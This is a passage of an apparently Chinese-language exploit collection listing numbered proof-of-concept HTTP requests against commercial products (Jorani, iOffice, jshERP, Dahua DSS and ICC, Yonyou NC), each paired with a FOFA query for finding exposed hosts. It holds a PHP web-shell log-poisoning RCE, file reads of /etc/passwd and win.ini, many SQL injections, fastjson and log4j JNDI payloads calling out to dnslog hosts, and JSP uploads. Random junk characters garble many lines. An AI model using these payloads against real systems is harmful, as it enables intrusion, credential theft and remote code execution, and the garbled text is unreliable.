. X+ f) u* }, ?" ?GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.16 F3 p! n j* K& U
Host: 127.0.0.1 S2 r1 C3 B: f6 Q9 w+ n
Pragma: no-cache
5 R% p" L$ e: d* c/ W3 u8 @+ ECache-Control: no-cache
E0 U- w: K" q6 |0 ^+ Z3 v4 gUpgrade-Insecure-Requests: 1
: ^0 m% x3 Q! d/ W! x3 h$ @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, E- ?' [, }- z* c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' L$ T; U4 v9 o$ x9 x& F3 J
Accept-Encoding: gzip, deflate/ q/ |) D/ I; n
Accept-Language: zh-CN,zh;q=0.9,en;q=0.83 @' r6 K+ h# N, h+ R
Connection: close
/ \4 a) a' } r$ q
8 ]" I/ u( t) v2 H1 w0 |6 C& Y3 D' }) ?
12. Jorani < 1.0.2 远程命令执行, H6 |% |4 v4 i! X2 {0 @
FOFA:title="Jorani"+ I0 s/ _8 k3 l$ Q/ X
第一步先拿到cookie
) L3 a3 s4 P4 x# N* O& oGET /session/login HTTP/1.1
; C$ d. a1 I1 RHost: 192.168.190.30
" v7 z$ q, z: V+ LUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
]) c! V A% A! P8 p7 I) Q E* h, q8 Y7 ^Connection: close
8 T# w4 V2 A' o/ A- o3 QAccept-Encoding: gzip
) w j# i4 t2 s7 w) h# U4 n* {. w- @( X, l7 _5 S
' `. K1 v7 z, Z' e
响应中csrf_cookie_jorani用于后续请求9 R; L/ k9 w, V' N; {5 M' l
HTTP/1.1 200 OK( W; ?" a7 o0 b6 ?
Connection: close
3 ~# g9 s3 A! M! B: ZCache-Control: no-store, no-cache, must-revalidate
" z& ]8 A) {6 i5 O4 h2 f8 D6 iContent-Type: text/html; charset=UTF-8
* Q5 j9 n1 W: ?* Y4 n/ WDate: Tue, 24 Oct 2023 09:34:28 GMT
9 _$ c' b$ s- b8 X. T) r6 y9 CExpires: Thu, 19 Nov 1981 08:52:00 GMT
, ^% ~: Q3 U6 W( R( o' W/ @. d' l8 zLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT/ Y! s: S) x0 }0 F
Pragma: no-cache
9 S3 Z) L3 }; b% ^& BServer: Apache/2.4.54 (Debian)3 t) `$ ~5 T+ v4 E+ H# E
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/& r$ w. c- J @6 [: z
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly/ y {: ]! w& n7 M
Vary: Accept-Encoding
8 O# ^! i: V3 T. s0 B& }- ^0 I9 D0 X5 d* k" i9 F/ `
f8 J6 M9 [ ?& j
POST请求,执行函数并进行base64编码9 S( x: [: V, f0 d( s* l
POST /session/login HTTP/1.1: V2 E8 f9 I) C F
Host: 192.168.190.30- v* n, D1 L! k( b3 f( \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.364 a3 l& a. v6 s0 N+ d
Connection: close. A0 q- n/ z. V$ H: d
Content-Length: 252
) M. m& [/ e. j: {: t4 h* zContent-Type: application/x-www-form-urlencoded/ g% q7 _" B5 p1 T8 H- R2 k
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r8 g9 d) G& L* i- T4 F7 I+ S
Accept-Encoding: gzip
* }" g( H4 L& A2 o R/ _* D& v7 _
8 b7 B. z! u2 K, E0 D6 xcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
, i) [5 R5 G' T: P+ \& a. V
! c0 Z( E9 n) S F" g8 m: k/ D7 H% X6 l
" T% d4 k: ?7 l
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串1 a p$ q* p8 j
GET /pages/view/log-2023-10-24 HTTP/1.1# A$ K' e: V* S- |5 Q" z+ Z
Host: 192.168.190.302 ]7 Q% e1 w% o$ ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
' E% ^& F, y* R+ uConnection: close6 r, _5 d0 ]" [
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r' Z7 x- [8 ?* e, g$ G" E( C
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=% N* R! Y5 N' x' I5 I5 z
X-REQUESTED-WITH: XMLHttpRequest
6 G( x7 ?( e' K5 pAccept-Encoding: gzip9 w8 E3 v/ Q- B/ S
5 d( _. B* z6 W$ ?8 s, \. ^
) [7 H$ z3 D, x+ r* c13. 红帆iOffice ioFileDown任意文件读取
$ A/ B& T) v0 F: XFOFA:app="红帆-ioffice"9 {9 p5 [, W v- n I" X
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
, z- M8 e" _! ~( Z) |+ [- Q1 IHost: x.x.x.x: Y |% I- O, G( ]6 d7 C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36) y9 _- J9 V8 H3 Q" d
Connection: close4 O9 J' Y8 Y# J0 D) D
Accept: */*
# R1 O# C* ?& N1 K2 iAccept-Encoding: gzip
; }9 D7 o" O& v0 I7 X9 C& z* y8 K5 n; @% {% L
% K8 D" K+ ?* f0 C
14. 华夏ERP(jshERP)敏感信息泄露" F V9 O" a: R: O ?* x
FOFA:body="jshERP-boot"
' r, l h6 h, p N) t2 n泄露内容包括用户名密码
. C6 O6 H6 h; Q+ p( c aGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
$ W4 C: Y5 G3 bHost: x.x.x.x9 y, w* { G4 m* [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.367 Y. @5 y2 |. Y, Y7 d2 ?& B
Connection: close9 e" l, X) Z; k( H0 _3 B" ]
Accept: */*
- A8 [3 s" }$ C) A, M& ~; LAccept-Language: en5 p2 z( z4 V7 M9 W9 b" l. O
Accept-Encoding: gzip
/ W( J* i. K# n, W3 V& Z$ i6 Q3 M! P' e# R D- I: K
8 w, H1 Q+ Y, s& @" U7 }15. 华夏ERP getAllList信息泄露
- x+ x$ g3 b0 q! g) A# `7 s6 [$ nCVE-2024-0490, h& B8 D B& @( H4 M/ e' ^2 d
FOFA:body="jshERP-boot"
: w" e+ u0 L4 o' B" g& K泄露内容包括用户名密码
3 j4 Q: O8 L1 @: m9 jGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
6 n, U/ F1 f5 i* S+ W# wHost: 192.168.40.130:100
8 Y9 ?# G; C+ V7 ?* W4 b( VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
. [3 v1 M- O3 X9 E( q- D, `" x) AConnection: close; ?' k0 x, r$ U I
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
, I: x" v) n0 G8 z4 f& u7 r8 @Accept-Language: en
: _7 A. O7 w* Y6 ksec-ch-ua-platform: Windows/ E+ t) \1 D" U9 X- J/ k
Accept-Encoding: gzip
. t; Y, o. m- \: k7 x9 f o
8 i/ d2 g. @5 E. d# ?. P, v
. y7 S. ~ |% ]16. 红帆HFOffice医微云SQL注入$ d) N; j# A% c: H& _) ~
FOFA:title="HFOffice"
! W0 L7 A) Q7 C: d5 V' Bpoc中调用函数计算1234的md5值
, x! I. s; C: E3 g9 [0 b0 O" `: |GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
7 b$ ?1 O, |0 i6 N1 RHost: x.x.x.x/ J' b" ^& C/ }' C
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36% C9 B) s+ {6 |% ~, q) a; f
Connection: close
W( b( L. R& X: ~5 {$ b; RAccept: */** h0 t8 H" | F" \' @' H9 U; l! _
Accept-Language: en
( x4 Z2 Q; f: pAccept-Encoding: gzip
& O1 N0 O& q0 f+ l7 W7 [& E( ~+ k2 e- Z, K6 ^ v6 \/ t3 @5 U
$ _; W1 |6 t$ y3 P6 G/ f, j# \17. 大华 DSS itcBulletin SQL 注入
# I# u4 Y0 {3 J5 c1 ?6 L: u+ N, `FOFA:app="dahua-DSS"
& [; D0 W+ j8 }POST /portal/services/itcBulletin?wsdl HTTP/1.1
5 m/ C& u8 P: T' ?% }Host: x.x.x.x
2 U9 h+ @1 C: {0 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* Q, N3 ~" B3 N: U
Connection: close
: o: Z( h9 M' z1 K+ D q. { JContent-Length: 345( z6 U* Y) g1 N; L7 G
Accept-Encoding: gzip
& G) |6 F$ S4 u: P
- k/ C. k3 W8 l<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>6 c, j+ O4 E2 C; U6 I* ~* c
<s11:Body>
2 X' [2 l T+ G$ t# \ <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
# z7 R9 N" W7 R2 S: s6 w: ` <netMarkings>
+ W& d( Q8 c; O8 r6 {) m' Q9 U, M (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=16 z5 r( t/ q) a+ P. [
</netMarkings>
6 a" G( Y& d% [9 s8 m! O! d </ns1:deleteBulletin>
% {+ d' M! c8 C5 s1 t </s11:Body>& @5 F/ _$ _9 |/ M
</s11:Envelope>4 B" A( a. w% f# m
2 _9 I( \$ c" M
5 E. u: S& Y! z3 \0 Q6 M. K$ V18. 大华 DSS 数字监控系统 user_edit.action 信息泄露" x1 h8 R# |" X9 ~# v4 [
FOFA:app="dahua-DSS" [; \: s4 d0 q; v. I
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
2 C* y1 k5 Q" ?Host: your-ip4 P0 v! i4 T, m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' q4 B( |: e9 n9 a; t
Accept-Encoding: gzip, deflate
3 v% C- `$ l5 A$ s" f4 p! ~5 \Accept: */*# z' r8 w& x" X& [0 E) ?
Connection: keep-alive
0 V7 F- L4 \0 v3 i: b1 j+ y
! H! a) M2 m& N" w+ r e3 l" b J" x6 U" \3 f
) C4 z ~4 E' g0 ?; v, S; S% C
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入+ @% p7 Y m" f* X# p$ E
FOFA:app="dahua-DSS" \" D6 D% A* J/ @' B
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
# q. _- r! A D# ]' lHost:
, [4 S o. o( h4 vUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36' g& U4 C0 U, |
Accept-Encoding: gzip, deflate5 @1 _# R$ _$ B* n
Accept: */*0 i& x, Y7 t6 [) C$ n, D! a! D: x+ x
Connection: keep-alive
% G! e) M+ {/ u. @& S3 {
& k) c2 Q6 I/ O7 C0 J7 ]# S* d, \
20. 大华ICC智能物联综合管理平台任意文件读取7 c T7 A* D4 @( q) x
FOFA:body="*客户端会小于800*"
9 ^2 ]/ s8 I5 SGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
% G9 a: S5 I b1 THost: x.x.x.x B; L4 P: L( t) ~0 j+ `
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ N1 D9 j) I/ E- ~4 `3 K4 o2 wConnection: close& ]8 g" _* ~# {6 W4 U5 s
Accept: */*
& ?1 t- [) C- D4 FAccept-Language: en
1 E8 v9 @* g y3 B" M2 G! K4 h2 eAccept-Encoding: gzip: e$ k" \2 L9 A; s
6 {9 B& L) d" x# F7 K- h
6 r1 h6 W& f, I5 A9 r* m: u21. 大华ICC智能物联综合管理平台random远程代码执行
3 E9 i' ?2 r% a# AFOFA:icon_hash="-1935899595"
! i: S; E+ e2 {9 HPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
. d) `/ N V% HHost: x.x.x.x
. S& b. v& u& C q6 bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% _0 g+ v; w9 q! }$ x6 sContent-Length: 161
. k3 R( d1 e+ v) e" ~Accept-Encoding: gzip
5 ]; d1 C% j% D5 T, m& {* tConnection: close2 z" O( e: @* H: ~/ {5 p4 J& F
Content-Type: application/json;charset=utf-82 b a% j: U2 ]; @, _$ y) F
. M2 L. d p1 ~! m& W" \{
# Z u3 p( i& M6 _' \"a":{
) L+ Q- F( M2 b- D3 c "@type":"com.alibaba.fastjson.JSONObject",- E! K! t6 @" G/ x$ s1 B8 d
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}: }& m* @0 E' g2 T' ^
}""+ v" I9 A# v" ]7 u
}
. _6 i+ d p, z, f/ ~5 A
( ]- A: ?- y; W5 ?" C6 v* k
& r) e8 c6 E7 ]! u9 T22. 大华ICC智能物联综合管理平台 log4j远程代码执行
1 e* [' P/ J* ^: Z p* f$ PFOFA:icon_hash="-1935899595"9 u8 |3 g% N: a: w g; b
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1+ r2 t. H/ q5 }. o1 \4 D6 v
Host: your-ip& l7 ]) ~9 G5 n8 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
2 o+ r/ u# D5 XContent-Type: application/json;charset=utf-85 K2 t* L( T( D' g, l) ]" m5 X4 l
5 U4 n+ p! k3 X4 _6 r8 e
{
. p. c; ^0 h- K' ]% o"loginName":"${jndi:ldap://dnslog}"
6 k/ Q" F9 s' ^$ l} r9 W! O3 t) P- J% s; d' @: C
7 M. ^3 c% v% U* w9 v8 X- F
: a8 q7 u: y: Z, ?0 G: v2 O1 Y
3 \$ G) y0 I/ z3 z+ x- e1 k23. 大华ICC智能物联综合管理平台 fastjson远程代码执行! {9 \8 c" p7 v4 P3 n+ {
FOFA:icon_hash="-1935899595"
2 ^+ B0 U/ f, u( o% p1 F% ~! D" qPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.17 X3 o3 B) V" d( I8 I# ~$ u
Host: your-ip4 {2 z4 e. f- \9 J# i: ?* @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ {7 W; O0 i8 o H/ V) EContent-Type: application/json;charset=utf-8
( e* j& O; C; B3 V# ?) g7 M6 n8 }+ h; lAccept-Encoding: gzip
# R2 K! L6 c7 lConnection: close2 x& I* I9 r2 }( h6 F
% {# F- ~) D1 I7 c, E+ G3 U{- E9 B4 x% I6 F' M6 u7 `. S: `7 h
"a":{
+ ^) s7 P! f# O# B "@type":"com.alibaba.fastjson.JSONObject",9 Z: v1 ?2 [, G9 w* u s
{"@type":"java.net.URL","val":"http://DNSLOG"}
1 i. C& Q9 J7 `7 m1 x: D) t4 ~2 | }""
: W; x/ f; @6 J: O# a' m}
1 H$ R- h% h) m/ V
) b$ ^1 }. n9 H% S; H9 A o3 P
4 q2 T! E2 n) j1 b8 ?4 W' T24. 用友NC 6.5 accept.jsp任意文件上传
8 j, v: i! k5 L! Q& {5 oFOFA:icon_hash="1085941792", O! T* P, E4 P8 X% O, J
POST /aim/equipmap/accept.jsp HTTP/1.1
f4 N5 G- W: ?" {Host: x.x.x.x
+ n2 v: w& R8 y8 N- c, F$ j6 n, nUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
: |1 y2 R: m+ @) ?! _& VConnection: close
' q2 z! g. J* T2 J+ gContent-Length: 449
" J- W3 A9 ?% W$ g( VAccept: */*6 K u; B: y A* l6 p3 Z
Accept-Encoding: gzip
, Y; x3 u5 P( ]; F+ Z- sContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
+ @5 o5 D# M! _$ r
1 y, P+ G( [5 M" K1 {-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc9 J5 U# \% w+ t/ P$ Y0 H# d+ J" A
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
% l* _3 b: I1 i4 ZContent-Type: text/plain
: p: ~4 s- X; S# R8 f9 i
1 Z7 }& ^. `2 ~+ [<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>: J7 C' t6 N4 T+ V, \2 s% ^- a
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc, h1 U/ _$ h; P6 P( _! C! S
Content-Disposition: form-data; name="fname": ]$ {, e2 @, A" m ]7 h
! `) f0 q( t4 S# z. U\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
; a% |* u, ~6 h5 T/ t-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
. `2 h% l9 H1 y4 P
* F# |" c) b9 _3 j6 w8 A; }. ^- ?1 o
25. 用友NC registerServlet JNDI 远程代码执行 r# g8 v( a" {$ k5 {5 Z8 \: K. ?6 B
FOFA:app="用友-UFIDA-NC"7 E% ]* _4 A1 s# B3 T0 E8 y& N
POST /portal/registerServlet HTTP/1.1
5 M$ x3 d# Y) I2 P JHost: your-ip: D' l, H8 K3 \, d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0, A6 Z2 z) ?. A9 }6 z6 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
$ V: j# Z; [7 Q/ M, I( p' ~1 b. @Accept-Encoding: gzip, deflate( o4 y& R% T. [7 ~
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6- V9 s) C0 A1 T( R/ d
Content-Type: application/x-www-form-urlencoded3 S* r7 d* r. u- G8 |! r k6 S
; U+ m: t* K. e
type=1&dsname=ldap://dnslog
% L# k" Y9 K5 g1 E5 _7 g0 I& {: h% H) M0 H8 Z/ o3 B6 Z
9 S! W' x' A. Q2 O" V4 g
/ F: ~( S( x1 i! o3 K26. 用友NC linkVoucher SQL注入$ b3 V/ y; i! v, z" H0 ~
FOFA:app="用友-UFIDA-NC"% i6 Y9 ^4 Z. X8 K5 {/ e) S
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
I. ]6 m& X2 X2 {Host: your-ip
9 S, o% E* j0 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, D. e* S7 n* t s/ IContent-Type: application/x-www-form-urlencoded
8 ~% v" h/ M9 h5 Y+ |" wAccept-Encoding: gzip, deflate, ^4 L! o y0 Q
Accept: */*
; c7 g% r0 g5 B: \% {1 c% B" zConnection: keep-alive% H, t5 K' V y3 O# D" m, |
' v- ^% N7 _/ w1 K% N# X( d# ?1 d3 F: x% _7 r& Q
27. 用友 NC showcontent SQL注入
3 F {) `$ a6 [FOFA:icon_hash="1085941792" v& u3 k2 b" E$ u1 ?' U
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1 u+ n; l; ?$ [& R2 V( U1 f3 h% K
Host: your-ip
5 g: x0 c+ J& B1 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
G/ Y* k9 T' ]( qAccept-Encoding: identity
4 ~9 W/ U J) \) pConnection: close
. }5 z$ a, I. u6 O xContent-Type: text/xml; charset=utf-8
- e/ r: p1 C% _0 c+ X4 e% x) S! J7 B) b6 ?2 Q- k
- y" c+ i, }; {( A: o' [6 B6 [
28. 用友NC grouptemplet 任意文件上传
+ S3 `5 a7 z' Y; M" gFOFA:icon_hash="1085941792"
/ B# `5 j# t; |+ T" r' T+ e* i4 [POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1: z" q9 V* ^2 J
Host: x.x.x.x
6 X, z- ?& H3 h0 k+ p$ UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
6 f9 C0 \! c$ F/ z7 U4 EConnection: close- H' ?: b+ ^: s! c) L# q
Content-Length: 2688 _! L' e5 S; c: s! L( j
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk/ l4 A$ z. ~. U: c+ x
Accept-Encoding: gzip7 | c1 @: c$ |4 r2 a. N; I7 [
. ^, S7 ~' Z) O% F% D$ F------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
! `" u) z6 U! C0 g/ \9 nContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
+ O; o" p) e8 G9 T9 Y: gContent-Type: application/octet-stream
5 T7 Q% {7 w, p2 t9 K1 O( l5 l4 T' r s$ i! H) Y. l
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>( ?) E4 b/ y' S, f; w( f: _
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
4 W5 c* q6 Q* O5 v2 V
; V, W7 ?+ y4 c+ \- b! H: K3 L- q
/uapim/static/pages/nc/head.jsp
' B% I0 ^4 t4 ~! @" t; X
, b7 a: x* L/ r! F6 C+ B7 D29. 用友NC down/bill SQL注入. Y- m. z6 W/ T
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"4 M, K7 R2 l1 S
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1, R: a# V+ x9 m1 M4 ]1 c* H
Host: your-ip& R5 q- p0 S* |8 N( i2 T$ |4 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) n# T# K, \7 V8 b r& ]; A
Content-Type: application/x-www-form-urlencoded0 H: u: ~7 q" I5 } b. c
Accept-Encoding: gzip, deflate
' A: M( r1 w: U5 qAccept: */*, m! p. x4 G! n" M( ]
Connection: keep-alive
, V" q0 x0 k7 B9 u" G
! ~$ o) M- D1 T! X0 ~: g" f* o2 L5 i2 E; j, k. v( f
30. 用友NC importPml SQL注入
3 a6 e9 D b8 i$ i5 R, HFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
# ~/ W' S$ t; d3 [. k' l; BPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
4 m2 r1 v; E7 M$ v- H' jHost: your-ip# |0 u! x+ Q) }0 t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V \; j& k4 e4 W3 Z7 J+ K# i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
" V& C6 t" c' n) G8 B0 Q- S6 _* j* BConnection: close
3 Z% w4 v, b* _/ j# V: W+ C6 ~! A$ d6 X# t! @5 m" m
------WebKitFormBoundaryH970hbttBhoCyj9V
6 z6 L7 o( D0 }! B7 VContent-Disposition: form-data; name="Filedata"; filename="1.jpg", u, y* y$ P" A/ f
Content-Type: image/jpeg
; c0 S% w* Y) j8 W9 a------WebKitFormBoundaryH970hbttBhoCyj9V--6 v K1 X( Z; ?7 e$ K
- k- W7 \% B1 Q. v& `- m* |
% A5 ?2 o2 _; q% E$ C31. 用友NC runStateServlet SQL注入5 j+ p8 C" R! T2 M. }2 S2 r
version<=6.5
: Z Q+ c& F6 G4 UFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
6 x- Z. j5 W; C6 B* A% H( w* aGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
( [$ x& h+ c7 P9 h+ P ?( q% z3 R6 _/ S% iHost: host
0 {( g3 L" D# jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.368 H/ m2 Z' u5 f& ^
Content-Type: application/x-www-form-urlencoded
; G/ S ~+ F( Y( e8 m x
. k' i! M$ y$ A
3 n9 p: \# ?: i0 k4 ~32. 用友NC complainbilldetail SQL注入. _5 I3 }8 l+ e0 |: I, ]9 V
version= NC633、NC65# h& \. w* d4 s8 Y
FOFA:app="用友-UFIDA-NC"( w. S6 d( ]$ K5 X+ x% t g. t) X' q
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1- L* S$ w+ W. a( n3 @7 [& Z
Host: your-ip
7 U& ~. x: J( B* M% P- NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 u# i5 u$ N' j# [, D% G* @9 z
Content-Type: application/x-www-form-urlencoded3 J0 y6 B+ G7 z* |4 }/ l: _9 [ t
Accept-Encoding: gzip, deflate
# e' O: @8 y5 U5 Y) OAccept: */*2 Z# ?; i6 x j, m
Connection: keep-alive `8 S6 L7 [. ]
% z+ l' u: v6 j+ j' P. p* }' Q. o; ^+ ~9 `
33. 用友NC downTax/download SQL注入
; h: L$ _! J" X2 Xversion:NC6.5FOFA:app="用友-UFIDA-NC"
5 G) v: Z; {7 JGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
3 l6 I- o c3 { v% [3 iHost: your-ip
5 O+ L* y) X' E& p$ _3 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ R7 a6 s0 j/ G# h
Content-Type: application/x-www-form-urlencoded( R; q$ o4 x K. R1 k
Accept-Encoding: gzip, deflate' @3 y$ C7 f4 c2 J, ?! V
Accept: */*3 T6 Y6 F6 M2 Y- s
Connection: keep-alive$ [# K) ~& a! a
% f* s# N" ]6 l# o1 v) l- b7 i, r" a: Y2 [4 I
34. 用友NC warningDetailInfo接口SQL注入
5 I2 I% n$ r& P, J: sFOFA:app="用友-UFIDA-NC"6 s8 w7 r8 i' T! _
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
9 D5 D3 X8 }# VHost: your-ip
2 V1 y6 K% q2 Q2 [" TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, B' y$ m, ]' ~. xContent-Type: application/x-www-form-urlencoded
, b! k- c; |% N3 s$ J4 A) _Accept-Encoding: gzip, deflate
' ] O; K" j- h+ @: N2 _Accept: */*1 N6 [2 l. P$ z' B" n3 N
Connection: keep-alive' y- K* x# v4 B2 w" O2 H9 o6 Z
/ c& R! p; w* ]+ x# M+ i& T) |% ~3 ?# @* _0 i
35. 用友NC-Cloud importhttpscer任意文件上传
, d# x- A0 n" e& C; C N; ?9 }0 G' xFOFA:app="用友-NC-Cloud"7 |8 r4 H# Y8 w3 T }; O9 I
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
